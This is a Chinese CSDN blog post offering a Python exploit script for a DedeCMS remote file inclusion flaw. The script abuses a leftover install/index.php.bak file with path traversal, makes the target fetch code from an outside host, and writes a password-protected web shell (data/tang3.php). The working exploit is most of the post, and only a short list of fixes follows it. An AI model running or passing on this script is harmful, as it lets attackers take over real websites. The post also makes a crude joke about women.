python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)

这篇博客介绍了如何利用Python编写脚本来检测和利用织梦CMS的远程代码执行漏洞。提供了漏洞利用和修复建议,包括删除或改名install文件夹,更改data文件夹的位置,升级织梦版本以及应用官方补丁。
摘要由CSDN通过智能技术生成

织梦CMS漏洞,就好比女人的大姨妈,每个月不来上一次,这就算是内分泌失调。代码是用python写的,小伙伴们自行调试吧!在前段时间,织梦爆出了一个远程文件包含漏洞。呃,感谢hoseph同学提供的代码吧。写的很不错!修复此漏洞方法,请见文章底部。

#! /usr/bin/env python

#coding=utf-8

#Joseph(小续)

import requests

import sys

import re

def main():

try:

url="http://"+sys.argv[1].strip('http://')

except IndexError:

print '''

poc: dede.py [url]http://www.baidu.com/[/url]

'''

payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"

urlpoc=url+payload

code=requests.get(urlpoc).status_code

if code==200:

print u"恭喜存在此漏洞"

print u"Ongoing attacks--->>>>>"

exploit(url)

pass

else:

print u"sorry 漏洞正在挣扎"

pass

def exploit(url):

urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"

htmlcontent=requests.get(urlpoc).content

Probe=re.compile(r'存在')

if Probe.findall(htmlcontent):

print u'''

ver:getshell成功

shell:url+/data/tang3.php?a=0  密码为:c

'''

pass

else:

print u"请看远程地址是否已经不可用"

pass

if __name__ == '__main__':

main()

修复方法:

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值